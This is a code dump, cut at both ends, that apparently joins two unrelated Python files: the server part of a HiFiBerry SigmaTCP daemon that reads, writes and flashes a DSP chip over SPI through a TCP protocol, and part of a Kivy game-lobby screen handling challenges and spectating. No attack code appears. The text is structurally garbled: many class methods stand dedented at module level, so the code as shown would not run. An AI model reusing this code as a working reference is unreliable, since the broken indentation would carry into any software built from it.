                result = self.write_eeprom_file(filename)

            elif data[0] == COMMAND_STORE_DATA:
                self.save_data_memory()

            elif data[0] == COMMAND_RESTORE_DATA:
                self.restore_data_memory()

            elif data[0] == COMMAND_CHECKSUM:
                result = self._response_packet(
                    COMMAND_CHECKSUM_RESPONSE, 0, 16) + \
                    self.program_checksum(cached=False)

            elif data[0] == COMMAND_XML:
                try:
                    data = self.get_and_check_xml()
                except IOError as e:
                    logging.debug("IOerror when reading XML file: %s", e)
                    data = None
                except Exception as e:
                    logging.debug("Unexpected error when reading XML file: %s", e)
                    logging.exception(e)
                    data = None

                if data is not None:
                    xml_bytes = data.encode()
                    result = self._response_packet(
                        COMMAND_XML_RESPONSE, 0, len(data)) + xml_bytes
                else:
                    result = self._response_packet(
                        COMMAND_XML_RESPONSE, 0, 0)

            elif data[0] == COMMAND_PROGMEM:
                try:
                    data = self.get_program_memory()
                except IOError:
                    data = []  # empty response
                # format program memory dump, one 4-byte word per line
                dump = ""
                for i in range(0, len(data), 4):
                    dump += "{:02X}{:02X}{:02X}{:02X}\n".format(
                        data[i], data[i + 1], data[i + 2], data[i + 3])
                result = self._response_packet(
                    COMMAND_PROGMEM_RESPONSE, 0, len(dump)) + \
                    dump.encode('ascii')

            elif data[0] == COMMAND_GPIO:
                logging.error("GPIO command not yet implemented")

            elif data[0] == COMMAND_DATAMEM:
                try:
                    data = self.get_data_memory()
                except IOError:
                    data = []  # empty response
                # format data memory dump, one 4-byte word per line
                dump = ""
                for i in range(0, len(data), 4):
                    dump += "{:02X}{:02X}{:02X}{:02X}\n".format(
                        data[i], data[i + 1], data[i + 2], data[i + 3])
                result = self._response_packet(
                    COMMAND_DATAMEM_RESPONSE, 0, len(dump)) + \
                    dump.encode('ascii')

            elif data[0] == COMMAND_GET_META:
                length = int.from_bytes(data[1:5], byteorder='big')
                if length < len(data):
                    # bugfix: this branch used to slice with command_length,
                    # a variable belonging to other command branches that may
                    # be stale or even undefined here; use this request's
                    # own length instead
                    buffer = data[length:]
                    data = data[0:length]
                attribute = data[14:length].decode("utf-8")
                value = self.get_meta(attribute)
                logging.debug("metadata request for %s = %s",
                              attribute, value)
                if value is None:
                    value = ""
                value = value.encode('utf-8')
                result = self._response_packet(
                    COMMAND_META_RESPONSE, 0, len(value))
                result += value

            elif data[0] == COMMAND_WRITE_EEPROM_CONTENT:
                command_length = int.from_bytes(
                    data[3:7], byteorder='big')
                logging.debug("Len (data, header info): %s %s",
                              len(data), command_length)
                if command_length < len(data):
                    buffer = data[command_length:]
                    data = data[0:command_length]
                if (command_length > 0) and (len(data) < command_length):
                    read_more = True
                    logging.debug(
                        "Expect %s bytes from header information (write), but have only %s", command_length, len(data))
                    continue
                result = self.write_eeprom_content(data[14:command_length])

            if (result is not None) and (len(result) > 0):
                logging.debug(
                    "Sending %s bytes answer to client", len(result))
                self.request.send(result)

            # Still got data that hasn't been processed?
            if buffer is not None:
                data = buffer
            else:
                data = None

        except ConnectionResetError:
            finished = True
        except BrokenPipeError:
            finished = True
@staticmethod
def read_xml_profile():
    """Load the DSP profile XML from disk and verify its checksum.

    Sets SigmaTCPHandler.xml, SigmaTCPHandler.checksum_xml and
    SigmaTCPHandler.checksum_error as side effects; on mismatch the cached
    profile is flagged invalid and ignored by get_checked_xml().
    """
    SigmaTCPHandler.xml = XmlProfile(SigmaTCPHandler.dspprogramfile)
    cs = SigmaTCPHandler.xml.get_meta("checksum")
    logging.debug("checksum from XML: %s", cs)
    SigmaTCPHandler.checksum_xml = None
    if cs is not None:
        # checksum is stored as a hex string; convert to raw bytes
        SigmaTCPHandler.checksum_xml = bytearray()
        for i in range(0, len(cs), 2):
            octet = int(cs[i:i + 2], 16)
            SigmaTCPHandler.checksum_xml.append(octet)
    checksum_mem = SigmaTCPHandler.program_checksum()
    checksum_xml = SigmaTCPHandler.checksum_xml
    logging.info("checksum memory: %s, xmlfile: %s",
                 checksum_mem,
                 checksum_xml)
    if (checksum_xml is not None) and (checksum_xml != 0):
        if (checksum_xml != checksum_mem):
            logging.error("checksums do not match, aborting")
            SigmaTCPHandler.checksum_error = True
            return
    else:
        logging.info("DSP profile doesn't have a checksum, "
                     "might be different from the program running now")
    SigmaTCPHandler.checksum_error = False
@staticmethod
def get_checked_xml():
    """Return the cached XmlProfile, loading it on first use.

    Returns None when the profile checksum does not match DSP memory.
    """
    if SigmaTCPHandler.checksum_error:
        logging.debug("XML checksum error, ignoring XML file")
        return None
    if SigmaTCPHandler.xml is None:
        SigmaTCPHandler.read_xml_profile()
    return SigmaTCPHandler.xml
@staticmethod
def get_and_check_xml():
    """Return the current DSP profile XML as a string, or None if unavailable.

    Previously this returned str(None) == "None" when no valid profile was
    loaded, which handle() then shipped to clients as profile data.
    """
    xml = SigmaTCPHandler.get_checked_xml()
    return None if xml is None else str(xml)
@staticmethod
def get_meta(attribute):
    """Return metadata *attribute* from the DSP profile XML (None if absent).

    The pseudo attribute "detected_dsp" is served from module state instead
    of the profile.
    """
    if attribute == "detected_dsp":
        return this.dsp
    try:
        xml = SigmaTCPHandler.get_checked_xml()
    except Exception:
        # narrowed from a bare except: a bare clause would also swallow
        # KeyboardInterrupt/SystemExit
        return None
    if xml is None:
        return None
    try:
        return xml.get_meta(attribute)
    except Exception:
        logging.error("can't get attribute %s from XML", attribute)
        return None
@staticmethod
def handle_read(data):
    """Serve a COMMAND_READ request: read registers via SPI, build response."""
    addr = int.from_bytes(data[10:12], byteorder='big')
    length = int.from_bytes(data[6:10], byteorder='big')
    logging.debug("Handle read %s/%s", addr, length)
    spi_response = SigmaTCPHandler.spi.read(addr, length)
    logging.debug("read {} bytes from {}".format(length, addr))
    header = SigmaTCPHandler._response_packet(
        COMMAND_READRESPONSE, addr, len(spi_response))
    return header + spi_response
@staticmethod
def handle_write(data):
    """Serve a COMMAND_WRITE request: write payload bytes to DSP memory.

    Also watches for the KILLCORE/HIBERNATE register writes that a client
    issues around a program download, to detect the start and the end of a
    DSP program update.
    """
    if len(data) < 14:
        logging.error("Got incorrect write request, length < 14 bytes")
        return None
    addr = int.from_bytes(data[12:14], byteorder='big')
    length = int.from_bytes(data[8:12], byteorder='big')
    if (length == 0):
        # Client might not implement length correctly and leave
        # it empty
        length = len(data) - 14
    _safeload = data[1]  # TODO: use this
    if addr == SigmaTCPHandler.dsp.KILLCORE_REGISTER and not(SigmaTCPHandler.updating):
        logging.debug(
            "write to KILLCORE seen, guessing something is updating the DSP")
        SigmaTCPHandler.prepare_update()
    logging.debug("writing {} bytes to {}".format(length, addr))
    memdata = data[14:]
    res = SigmaTCPHandler.spi.write(addr, memdata)
    if addr == SigmaTCPHandler.dsp.HIBERNATE_REGISTER and \
            SigmaTCPHandler.updating and memdata == b'\00\00':
        logging.debug(
            "set HIBERNATE to 0 seen, guessing update is done")
        SigmaTCPHandler.finish_update()
    return res
@staticmethod
def write_eeprom_content(xmldata):
    """Flash an EEPROM image given as SigmaStudio XML.

    Replays the writeXbytes/delay actions from the XML onto the DSP via
    SPI, then stores the XML as the current DSP program file.
    Returns b'\\x01' on success, b'\\x00' on any failure.
    """
    logging.info("writing XML file: %s", xmldata)
    try:
        doc = xmltodict.parse(xmldata)
        SigmaTCPHandler.prepare_update()
        for action in doc["ROM"]["page"]["action"]:
            instr = action["@instr"]
            if instr == "writeXbytes":
                addr = int(action["@addr"])
                paramname = action["@ParamName"]
                # payload is a space-separated list of hex bytes
                data = []
                for d in action["#text"].split(" "):
                    value = int(d, 16)
                    data.append(value)
                logging.debug("writeXbytes %s %s", addr, len(data))
                SigmaTCPHandler.spi.write(addr, data)
                # Sleep after erase operations
                if ("g_Erase" in paramname):
                    logging.debug(
                        "found erase command, waiting 10 seconds to finish")
                    time.sleep(10)
                # Delay after a page write
                if ("Page_" in paramname):
                    logging.debug(
                        "found page write command, waiting 0.5 seconds to finish")
                    time.sleep(0.5)
            if instr == "delay":
                logging.debug("delay")
                time.sleep(1)
        SigmaTCPHandler.finish_update()
        # Write current DSP profile
        with open(SigmaTCPHandler.dspprogramfile, "w+b") as dspprogram:
            if (isinstance(xmldata, str)):
                xmldata = xmldata.encode("utf-8")
            dspprogram.write(xmldata)
    except Exception as e:
        logging.error("exception during EEPROM write: %s", e)
        logging.exception(e)
        return b'\00'
    return b'\01'
@staticmethod
def write_eeprom_file(filename):
    """Read an XML EEPROM image from *filename* and flash it.

    Returns b'\\x01' on success, b'\\x00' on failure.
    """
    try:
        with open(filename) as fd:
            return SigmaTCPHandler.write_eeprom_content(fd.read())
    except IOError as e:
        logging.debug("IOError: %s", e)
        return b'\00'
@staticmethod
def save_data_memory():
    """Dump DSP data memory plus the program checksum to the parameter file."""
    logging.info("store: getting checksum")
    checksum = SigmaTCPHandler.program_checksum()
    dsp = SigmaTCPHandler.dsp
    memory = SigmaTCPHandler.get_memory_block(dsp.DATA_ADDR,
                                              dsp.DATA_LENGTH)
    logging.info("store: writing memory dump to file")
    SigmaTCPHandler.store_parameters(checksum, memory)
@staticmethod
def restore_data_memory():
    """Restore DSP data memory from the parameter file.

    Does nothing unless the stored dump's checksum matches the program
    currently in DSP memory, or when the dump is larger than the data
    region.
    """
    logging.info("restore: checking checksum")
    checksum = SigmaTCPHandler.program_checksum(cached=False)
    memory = SigmaTCPHandler.restore_parameters(checksum)
    if memory is None:
        return
    logging.info("restore: writing to memory")
    dsp = SigmaTCPHandler.dsp
    if (len(memory) > dsp.DATA_LENGTH * dsp.WORD_LENGTH):
        logging.error("Got %s bytes to restore, but memory is only %s",
                      len(memory),
                      dsp.DATA_LENGTH * dsp.WORD_LENGTH)
        # abort instead of writing past the data region (previously this
        # only logged the error and wrote the oversized dump anyway)
        return
    # Make sure DSP isn't running for this operation
    SigmaTCPHandler._kill_dsp()
    SigmaTCPHandler.spi.write(dsp.DATA_ADDR, memory)
    # Restart the core
    SigmaTCPHandler._start_dsp()
@staticmethod
def get_memory_block(addr, length):
    """Read *length* words starting at word address *addr* via SPI.

    Returns a bytearray of exactly length * WORD_LENGTH bytes.  The DSP
    core is stopped for the duration of the read and restarted afterwards.
    """
    block_size = 2048  # bytes fetched per SPI read
    dsp = SigmaTCPHandler.dsp
    logging.debug("reading %s bytes from memory",
                  length * dsp.WORD_LENGTH)
    # Must kill the core to read program memory, but it doesn't
    # hurt doing it also for other memory types :(
    SigmaTCPHandler._kill_dsp()
    memory = bytearray()
    while len(memory) < length * dsp.WORD_LENGTH:
        logging.debug("reading memory code block from addr %s", addr)
        data = SigmaTCPHandler.spi.read(addr, block_size)
        # logging.debug("%s", data)
        memory += data
        # advance by the number of words just read
        addr = addr + int(block_size / dsp.WORD_LENGTH)
    # Restart the core
    SigmaTCPHandler._start_dsp()
    return memory[0:length * dsp.WORD_LENGTH]
@staticmethod
def get_program_memory():
    '''
    Return a dump of the DSP program memory up to (and including) the
    program end signature, or None on an SPI communication error.
    '''
    dsp = SigmaTCPHandler.dsp
    memory = SigmaTCPHandler.get_memory_block(dsp.PROGRAM_ADDR,
                                              dsp.PROGRAM_LENGTH)
    end_index = memory.find(dsp.PROGRAM_END_SIGNATURE)
    if end_index < 0:
        # no end signature: distinguish "signature missing" from
        # "SPI bus returned nothing but zeros"
        memsum = 0
        for i in memory:
            memsum = memsum + i
        if (memsum > 0):
            logging.error("couldn't find program end signature," +
                          " using full program memory")
            end_index = dsp.PROGRAM_LENGTH - dsp.WORD_LENGTH
        else:
            logging.error("SPI returned only zeros - communication"
                          "error")
            return None
    else:
        end_index = end_index + len(dsp.PROGRAM_END_SIGNATURE)
    logging.debug("Program lengths = %s words",
                  end_index / dsp.WORD_LENGTH)
    # logging.debug("%s", memory[0:end_index])
    return memory[0:end_index]
@staticmethod
def get_data_memory():
    '''
    Return a dump of the DSP data memory.
    '''
    dsp = SigmaTCPHandler.dsp
    memory = SigmaTCPHandler.get_memory_block(dsp.DATA_ADDR,
                                              dsp.DATA_LENGTH)
    logging.debug("Data lengths = %s words",
                  dsp.DATA_LENGTH / dsp.WORD_LENGTH)
    # logging.debug("%s", memory[0:end_index])
    # NOTE(review): get_memory_block returns DATA_LENGTH * WORD_LENGTH
    # bytes, but the slice below keeps only DATA_LENGTH bytes (word count,
    # not byte count) — looks like an unintended truncation; confirm intent.
    return memory[0:dsp.DATA_LENGTH]
@staticmethod
def program_checksum(cached=True):
    """Return the MD5 digest (bytes) of the DSP program memory, or None.

    With cached=True a previously computed digest is reused; it may be
    stale if the program changed behind our back.
    """
    if cached and SigmaTCPHandler.checksum is not None:
        logging.debug("using cached program checksum, "
                      "might not always be correct")
        return SigmaTCPHandler.checksum
    data = SigmaTCPHandler.get_program_memory()
    if data is None:
        # get_program_memory returns None on SPI communication errors;
        # previously this was papered over by a bare except around update()
        logging.error("Can't calculate checksum from %s", data)
        return None
    m = hashlib.md5()
    m.update(data)
    logging.debug("length: %s, digest: %s", len(data), m.digest())
    logging.info("caching program memory checksum")
    SigmaTCPHandler.checksum = m.digest()
    return SigmaTCPHandler.checksum
@staticmethod
def _list_str(int_list):
    """Format a list of ints as "[a,b,c]" (no spaces)."""
    return "[" + ','.join(str(item) for item in int_list) + "]"
@staticmethod
def _response_packet(command, addr, data_length):
    """Build a HEADER_SIZE response header for *command*.

    data_length is stored big-endian in bytes 6-9, addr in bytes 10-11.
    """
    packet = bytearray(HEADER_SIZE)
    packet[0] = command
    packet[4] = 14  # header length
    packet[5] = 1   # chip address
    # 32-bit big-endian payload length
    for offset, shift in ((6, 24), (7, 16), (8, 8), (9, 0)):
        packet[offset] = (data_length >> shift) & 0xff
    # 16-bit big-endian address
    packet[10] = (addr >> 8) & 0xff
    packet[11] = addr & 0xff
    return packet
@staticmethod
def _kill_dsp():
    """Stop the DSP core: hibernate first, then pulse the kill-core register.

    The short sleeps give the DSP time to act on each register write; the
    write order matters.
    """
    logging.debug("killing DSP core")
    dsp = SigmaTCPHandler.dsp
    spi = SigmaTCPHandler.spi
    spi.write(dsp.HIBERNATE_REGISTER,
              int_data(1, dsp.REGISTER_WORD_LENGTH))
    time.sleep(0.0001)
    spi.write(dsp.KILLCORE_REGISTER,
              int_data(0, dsp.REGISTER_WORD_LENGTH))
    time.sleep(0.0001)
    spi.write(dsp.KILLCORE_REGISTER,
              int_data(1, dsp.REGISTER_WORD_LENGTH))
@staticmethod
def _start_dsp():
    """Restart the DSP core: clear kill, pulse start-core, leave hibernation.

    Mirror image of _kill_dsp(); the short sleeps and write order matter.
    """
    logging.debug("starting DSP core")
    dsp = SigmaTCPHandler.dsp
    spi = SigmaTCPHandler.spi
    spi.write(dsp.KILLCORE_REGISTER,
              int_data(0, dsp.REGISTER_WORD_LENGTH))
    time.sleep(0.0001)
    spi.write(dsp.STARTCORE_REGISTER,
              int_data(0, dsp.REGISTER_WORD_LENGTH))
    time.sleep(0.0001)
    spi.write(dsp.STARTCORE_REGISTER,
              int_data(1, dsp.REGISTER_WORD_LENGTH))
    time.sleep(0.0001)
    spi.write(dsp.HIBERNATE_REGISTER,
              int_data(0, dsp.REGISTER_WORD_LENGTH))
@staticmethod
def store_parameters(checksum, memory):
    """Persist *checksum* (16 bytes) followed by the raw memory dump."""
    with open(SigmaTCPHandler.parameterfile, "wb") as datafile:
        datafile.write(checksum)
        datafile.write(memory)
@staticmethod
def restore_parameters(checksum):
    """Return the stored data-memory dump if its checksum matches *checksum*.

    File layout: 16 checksum bytes followed by the raw memory dump (see
    store_parameters).  Returns None on a checksum mismatch.
    """
    with open(SigmaTCPHandler.parameterfile, "rb") as datafile:
        file_checksum = datafile.read(16)
        logging.debug("Checking checksum %s/%s",
                      checksum, file_checksum)
        if checksum != file_checksum:
            logging.error("checksums do not match, aborting")
            return None
        # bugfix: the dump was never returned, so restore_data_memory
        # always received None and aborted; return the remaining bytes
        return datafile.read()
@staticmethod
def prepare_update():
    '''
    Call this method if the DSP program might change soon
    '''
    logging.info("preparing for memory update")
    # invalidate the cached checksum and detach the register syncs while
    # program memory is in flux; finish_update() re-attaches them
    SigmaTCPHandler.checksum = None
    SigmaTCPHandler.update_alsasync(clear=True)
    SigmaTCPHandler.update_lgsoundsync(clear=True)
    SigmaTCPHandler.updating = True
@staticmethod
def finish_update():
    '''
    Call this method after the DSP program has been refreshed
    '''
    logging.info("finished memory update")
    # drop the cached profile; ProgramRefresher recomputes the checksum and
    # re-attaches the register syncs asynchronously
    SigmaTCPHandler.xml = None
    ProgramRefresher().start()
@staticmethod
def update_alsasync(clear=False):
    """Point the ALSA volume sync at the profile's volume control register.

    With clear=True, or when the profile has no volume control attribute,
    the volume register is detached instead.
    """
    if SigmaTCPHandler.alsasync is None:
        return
    if clear:
        SigmaTCPHandler.alsasync.set_volume_register(None)
        return
    volreg = SigmaTCPHandler.get_meta(ATTRIBUTE_VOL_CTL)
    if volreg is None or len(volreg) == 0:
        SigmaTCPHandler.alsasync.set_volume_register(None)
        # bugfix: previously fell through here and crashed in
        # datatools.parse_int(None)
        return
    reg = datatools.parse_int(volreg)
    SigmaTCPHandler.alsasync.set_volume_register(reg)
@staticmethod
def update_lgsoundsync(clear=False):
    """Configure LG Sound Sync with the profile's volume/SPDIF/mute registers.

    With clear=True, or when any of the three attributes is missing from
    the profile, all registers are detached and Sound Sync is disabled.
    """
    if SigmaTCPHandler.lgsoundsync is None:
        logging.debug("LG Sound Sync instance is None")
        return
    if clear:
        # consistency fix: set_registers is called with three register
        # arguments everywhere else
        SigmaTCPHandler.lgsoundsync.set_registers(None, None, None)
        return
    logging.debug("checking profile for SPDIF state and volume control support")
    volreg = SigmaTCPHandler.get_meta(ATTRIBUTE_VOL_CTL)
    spdifreg = SigmaTCPHandler.get_meta(ATTRIBUTE_SPDIF_ACTIVE)
    mutereg = SigmaTCPHandler.get_meta(ATTRIBUTE_MUTE_REG)
    if volreg is None or len(volreg) == 0 or \
            spdifreg is None or len(spdifreg) == 0 or \
            mutereg is None or len(mutereg) == 0:
        SigmaTCPHandler.lgsoundsync.set_registers(None, None, None)
        logging.debug("disabled LG Sound Sync")
        # bugfix: previously fell through here and crashed in
        # datatools.parse_int(None)
        return
    logging.info("enabling LG Sound Sync")
    volr = datatools.parse_int(volreg)
    spdifr = datatools.parse_int(spdifreg)
    muter = datatools.parse_int(mutereg)
    SigmaTCPHandler.lgsoundsync.set_registers(volr, spdifr, muter)
class ProgramRefresher(Thread):
    """Background thread refreshing cached state after a DSP program update."""

    def run(self):
        logging.debug(
            "running asynchrounous checksum refresh after potential update")
        time.sleep(0)
        # recalculate checksum
        SigmaTCPHandler.program_checksum(cached=False)
        # update volume register for ALSA control
        SigmaTCPHandler.update_alsasync()
        SigmaTCPHandler.update_lgsoundsync()
        SigmaTCPHandler.updating = False
        if this.notify_on_updates is not None:
            try:
                r = requests.post(this.notify_on_updates)
                logging.info("sent update notify to %s, HTTP status %s",
                             this.notify_on_updates, r.status_code)
            except requests.RequestException as e:
                # a failing notify must not kill the refresh thread
                logging.error("update notify to %s failed: %s",
                              this.notify_on_updates, e)
class SigmaTCPServer(ThreadingMixIn, TCPServer):
    """Threaded TCP server dispatching connections to SigmaTCPHandler."""

    def __init__(self,
                 server_address=("0.0.0.0", DEFAULT_PORT),
                 RequestHandlerClass=SigmaTCPHandler):
        # allow quick restarts without waiting out TIME_WAIT sockets
        self.allow_reuse_address = True
        TCPServer.__init__(self, server_address, RequestHandlerClass)

    def server_activate(self):
        TCPServer.server_activate(self)

    def server_close(self):
        # NOTE: calls TCPServer.server_close directly, which bypasses
        # ThreadingMixIn.server_close (and its thread joining) — presumably
        # deliberate to avoid blocking on handler threads; confirm.
        TCPServer.server_close(self)
class SigmaTCPServerMain():
    """Entry point object: configures and runs the sigmatcp TCP server."""

    def __init__(self, alsa_mixer_name="DSPVolume"):
        # alsa_mixer_name: name of the ALSA mixer control to create when the
        # "alsa" option is enabled in the configuration
        self.restore = False   # restore saved data memory on startup
        self.abort = False     # set when initialisation failed
        self.zeroconf = None
        self.server = SigmaTCPServer()

        params = self.parse_config()

        if params["alsa"]:
            logging.info("initializing ALSA mixer control %s", alsa_mixer_name)
            alsasync = AlsaSync()
            if alsasync.set_alsa_control(alsa_mixer_name):
                SigmaTCPHandler.alsasync = alsasync
                # attach the profile's volume register, if it declares one
                volreg = SigmaTCPHandler.get_meta(ATTRIBUTE_VOL_CTL)
                if volreg is not None and len(volreg) > 0:
                    reg = datatools.parse_int(volreg)
                    alsasync.set_volume_register(reg)
                alsasync.start()
            else:
                logging.error("can't create mixer control - aborting")
                self.abort=True
        else:
            logging.info("not using ALSA volume control")
            self.alsa_mixer_name = None

        if params["lgsoundsync"]:
            try:
                logging.info("initializing LG Sound Sync")
                SigmaTCPHandler.lgsoundsync = SoundSync()
                SigmaTCPHandler.lgsoundsync.start()
                SigmaTCPHandler.update_lgsoundsync()
            except Exception as e:
                logging.exception(e)
        else:
            logging.info("not enabling LG Sound Sync")

        if this.notify_on_updates is not None:
            logging.info("Sending notifies on program updates to %s",
                         this.notify_on_updates)

        if params["restore"]:
            self.restore = True
def parse_config(self):
    """Read /etc/sigmatcp.conf and merge command line overrides.

    Returns a dict with "alsa", "lgsoundsync" and "restore" flags; also
    sets this.command_after_startup and this.notify_on_updates as side
    effects.
    """
    config = configparser.ConfigParser()
    # keep option names case-sensitive
    config.optionxform = lambda option: option
    config.read("/etc/sigmatcp.conf")

    params = {}

    # narrowed from bare excepts: missing sections/options raise
    # configparser.Error, malformed booleans raise ValueError
    try:
        params["alsa"] = config.getboolean("server", "alsa")
    except (configparser.Error, ValueError):
        params["alsa"] = False
    if "--alsa" in sys.argv:
        params["alsa"] = True

    try:
        params["lgsoundsync"] = config.getboolean("server", "lgsoundsync")
    except (configparser.Error, ValueError):
        params["lgsoundsync"] = False
    if "--lgsoundsync" in sys.argv:
        params["lgsoundsync"] = True

    try:
        this.command_after_startup = config.get("server", "command_after_startup")
    except configparser.Error:
        this.command_after_startup = None

    try:
        this.notify_on_updates = config.get("server", "notify_on_updates")
    except configparser.Error:
        this.notify_on_updates = None

    params["restore"] = "--restore" in sys.argv
    return params
# def announce_zeroconf(self):
# desc = {'name': 'SigmaTCP',
# 'vendor': 'HiFiBerry',
# 'version': hifiberrydsp.__version__}
# hostname = socket.gethostname()
# try:
# ip = socket.gethostbyname(hostname)
# except Exception:
# logging.error("can't get IP for hostname %s, "
# "not initialising Zeroconf",
# hostname)
# return
#
# self.zeroconf_info = ServiceInfo(ZEROCONF_TYPE,
# "{}.{}".format(
# hostname, ZEROCONF_TYPE),
# socket.inet_aton(ip),
# DEFAULT_PORT, 0, 0, desc)
# self.zeroconf = Zeroconf()
# self.zeroconf.register_service(self.zeroconf_info)
#
# def shutdown_zeroconf(self):
# if self.zeroconf is not None and self.zeroconf_info is not None:
# self.zeroconf.unregister_service(self.zeroconf_info)
#
# self.zeroconf_info = None
# self.zeroconf.close()
# self.zeroconf = None
def run(self):
    """Detect the DSP, optionally restore memory, then serve until Ctrl-C."""
    # Check if a DSP is detected
    dsp_detected = adau145x.Adau145x.detect_dsp()
    if dsp_detected:
        logging.info("detected ADAU14xx DSP")
        this.dsp="ADAU15xx"
    else:
        logging.info("did not detect ADAU14xx DSP")
        this.dsp=""

    if (self.restore):
        try:
            logging.info("restoring saved data memory")
            SigmaTCPHandler.restore_data_memory()
            SigmaTCPHandler.finish_update()
        except IOError:
            # no parameter file yet — nothing to restore
            logging.info("no saved data found")

    # logging.info("announcing via zeroconf")
    # try:
    #     self.announce_zeroconf()
    # except Exception as e:
    #     logging.debug("exception while initialising Zeroconf")
    #     logging.exception(e)

    logging.debug("done")

    # run the optional post-startup command in a background thread
    logging.info(this.command_after_startup)
    notifier_thread = Thread(target = startup_notify)
    notifier_thread.start()

    try:
        if not(self.abort):
            logging.info("starting TCP server")
            self.server.serve_forever()
    except KeyboardInterrupt:
        # orderly shutdown: close socket, stop syncs, persist data memory
        logging.info("aborting ")
        self.server.server_close()

        if SigmaTCPHandler.alsasync is not None:
            SigmaTCPHandler.alsasync.finish()
        if SigmaTCPHandler.lgsoundsync is not None:
            SigmaTCPHandler.lgsoundsync.finish()

        # logging.info("removing from zeroconf")
        # self.shutdown_zeroconf()

        logging.info("saving DSP data memory")
        SigmaTCPHandler.save_data_memory()
|
lobbyscreen.py | from json.decoder import JSONDecodeError
import time
import requests
import threading
import pyperclip
import subprocess
from functools import partial
from config import *
from kivy.properties import ObjectProperty
from kivy.uix.screenmanager import Screen
from ui.modals import *
from ui.buttons import DummyBtn, PlayerRow
import presence
import logging
class LobbyScreen(Screen):
    """Screen showing one lobby: idle players, challenges and running matches."""

    active_pop = None  # active popup on the screen
    player_list = ObjectProperty(None)  # layout for idle players
    challenge_list = ObjectProperty(None)  # layout for incoming challenges
    match_list = ObjectProperty(None)  # layout for running matches
    lobby_code = ObjectProperty(None)  # label showing the lobby code

    def __init__(self, CApp, **kwargs):
        super(LobbyScreen, self).__init__(**kwargs)
        self.app = CApp
        self.secret = None  # secret required for server messages
        self.lobby_thread_flag = 0  # nonzero stops the auto_refresh thread
        self.watch_player = None  # id of player to watch for spectating, TODO
        self.player_id = None  # our own ID as provided by the JSON
        self.code = None  # lobby code
        self.lobby_updater = None  # thread to manage lobby updates
        self.widget_index = {}  # ids of players -> row widget in the lobby
        self.error = False
        self.challenge_name = None  # name of player being challenged
        self.opponent = None  # name of player currently being played against
        self.challenge_id = None  # id of player being challenged
        self.type = None  # lobby type string ("Public"/"Private")
        self.get_attempts = 0  # consecutive failed refreshes; if 2, exit
def create(self, j, first=False, type=""):  # json response object
    """Build or refresh the lobby UI from server JSON *j*.

    With first=True the screen is initialised (ids, lobby code, Discord
    presence) and the auto-refresh thread is started; later calls only
    reconcile the three widget lists against the JSON.
    """
    print(j)
    # this does not use self.type because it should only run once per lobby.
    # the reason for this is that a player may start a Direct Online match
    # separately and we do not want to erase that status.
    # self.type is used for update_stats in the Caster function to signal
    # info to the presence.
    newSound = False  # play the alert sound at most once per refresh
    if first:
        self.player_id = j['msg']
        self.code = j['id']
        self.lobby_code.text = "[%s Lobby Code: %s]" % (type, self.code)
        self.widget_index = {}
        self.player_list.clear_widgets()
        self.match_list.clear_widgets()
        self.challenge_list.clear_widgets()
        self.type = type
        if self.app.discord is True:
            if type.lower() == 'public':
                self.app.mode = 'Public Lobby'
                presence.public_lobby(self.code)
            elif type.lower() == 'private':
                self.app.mode = 'Private Lobby'
                presence.private_lobby()
            self.app.game.update_stats(once=True)
    challenging_ids = []
    # TODO: come up with a solution for players with identical names (this does not affect the server )
    if j['challenges'] != []:
        # ensure the "Challenges" header row exists
        if 'c' not in self.widget_index:
            h = DummyBtn()
            h.text = 'Challenges (click to accept)'
            self.challenge_list.add_widget(h)
            self.widget_index.update({'c':h})
        for i in j['challenges']:  # name, id, ip of challenger
            challenging_ids.append(i[1])
            if i[1] in self.widget_index:
                if self.widget_index.get(i[1]).parent == self.challenge_list:
                    pass
                else:  # remove idle player
                    self.widget_index.get(i[1]).parent.remove_widget(self.widget_index.get(i[1]))
                    p = PlayerRow()
                    p.ids['PlayerBtn'].text = i[0]
                    p.ids['PlayerBtn'].bind(on_release=partial(
                        self.accept_challenge, name=i[0], id=i[1], ip=i[2]))
                    p.ids['WatchBtn'].text = ""
                    self.challenge_list.add_widget(p)
                    self.widget_index.update({i[1]:p})
                    if newSound is False:
                        self.app.sound.play_alert()
                        newSound = True
            else:
                p = PlayerRow()
                p.ids['PlayerBtn'].text = i[0]
                p.ids['PlayerBtn'].bind(on_release=partial(
                    self.accept_challenge, name=i[0], id=i[1], ip=i[2]))
                p.ids['WatchBtn'].text = ""
                self.challenge_list.add_widget(p)
                self.widget_index.update({i[1]:p})
                if newSound is False:
                    self.app.sound.play_alert()
                    newSound = True
    else:
        # no challenges left: drop any rows still in the challenge list
        n = []
        for k,v in self.widget_index.items():
            if v in self.challenge_list.children:
                v.parent.remove_widget(v)
                n.append(k)
        for i in n:
            self.widget_index.pop(i)
    if j['idle'] != []:
        # ensure the "Idle players" header row exists
        if 'i' not in self.widget_index:
            h = DummyBtn()
            h.text = 'Idle players (click to challenge)'
            self.player_list.add_widget(h)
            self.widget_index.update({'i':h})
        for i in j['idle']:
            if i[1] not in challenging_ids:
                if i[1] in self.widget_index:
                    pass
                else:
                    p = PlayerRow()
                    p.ids['PlayerBtn'].text = i[0]
                    if i[1] != self.player_id:
                        p.ids['PlayerBtn'].bind(on_release=partial(
                            self.send_challenge, name=i[0], id=i[1]))
                        if i[1] == self.watch_player:
                            p.ids['WatchBtn'].text = 'FOLLOWING'
                        else:
                            p.ids['WatchBtn'].text = 'FOLLOW'
                        p.ids['WatchBtn'].bind(on_release=partial(self.follow_player, i=i[1]))
                    else:
                        # our own row: not clickable, no follow button
                        p.ids['PlayerBtn'].text += " (self)"
                        p.ids['WatchBtn'].disabled = True
                        p.ids['WatchBtn'].text = ""
                    self.player_list.add_widget(p)
                    self.widget_index.update({i[1]:p})
    else:
        n = []
        for k,v in self.widget_index.items():
            if v in self.player_list.children:
                v.parent.remove_widget(v)
                n.append(k)
        for i in n:
            self.widget_index.pop(i)
    if j['playing'] != []:
        # ensure the "Now playing" header row exists
        if 'w' not in self.widget_index:
            h = DummyBtn()
            h.text = 'Now playing (click to watch)'
            self.match_list.add_widget(h)
            self.widget_index.update({'w':h})
        for i in j['playing']:
            if (i[2],i[3]) in self.widget_index:
                pass
            else:
                p = PlayerRow()
                p.ids['PlayerBtn'].text = "%s vs %s" % (i[0], i[1])
                if i[2] != self.player_id and i[3] != self.player_id:
                    p.ids['PlayerBtn'].bind(on_release=partial(self.watch_match,
                                            name="%s vs %s" % (i[0], i[1]), ip=i[4]))
                p.ids['WatchBtn'].text = ""
                self.match_list.add_widget(p)
                self.widget_index.update({(i[2],i[3]):p})
                # auto-spectate when a followed player starts a match
